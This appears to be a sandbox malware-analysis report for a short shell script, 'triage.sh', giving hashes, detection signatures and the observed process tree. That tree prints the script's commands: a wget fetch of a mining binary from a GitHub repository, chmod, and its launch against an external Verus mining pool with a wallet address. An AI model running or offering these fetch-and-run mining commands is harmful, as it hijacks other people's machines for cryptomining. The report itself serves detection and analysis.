Overview

overview

7

Static

static

1

triage.sh

ubuntu-18.04-amd64

6

triage.sh

ubuntu-20.04-amd64

7

triage.sh

ubuntu-22.04-amd64

7

triage.sh

ubuntu-24.04-amd64

7

Analysis

  • max time kernel
    0s
  • max time network
    1679s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240508-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    14-07-2024 09:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    triage.sh

  • Size

    338B

  • MD5

    dead3dccf4825eb422f4dac04f2d8279

  • SHA1

    61285497f6daecf9d6d6128d5ced6f19057f93bd

  • SHA256

    6df4fd30bb503ece3c987d6932d355fa7da868fa28f901b9781e6fd8df1bf4db

  • SHA512

    c4c5fc0a655488ea60b4d5801cab925e180e3d018f88e9238eb9bc794ddc73ec44059fad796cb1655fed44a7c861990d5960eb7a41f8fa4a24390cb27cd1f55b

Score
6/10

Malware Config

Signatures

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/triage.sh
    /tmp/triage.sh
    1⤵
      PID:1516
      • /usr/bin/sudo
        sudo apt-get install libcurl4-openssl-dev libssl-dev libomp-dev libjansson-dev automake autotools-dev build-essential -y
        2⤵
        • Reads runtime system information
        PID:1517
      • /usr/bin/wget
        wget https://raw.githubusercontent.com/MomboteQ/Free-Crypto-Mining/main/verus/cc
        2⤵
          PID:1518
        • /bin/chmod
          chmod +x cc
          2⤵
            PID:1522
          • /usr/bin/clear
            clear
            2⤵
              PID:1523
            • /usr/bin/nproc
              nproc
              2⤵
                PID:1524
              • /tmp/cc
                ./cc -a verus -o stratum+tcp://verus.farm:9999 -u RHACKERwSVgjTvV4vNiTjmrkLTD7a92ALD.Linux -p x -t 1
                2⤵
                  PID:1528

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads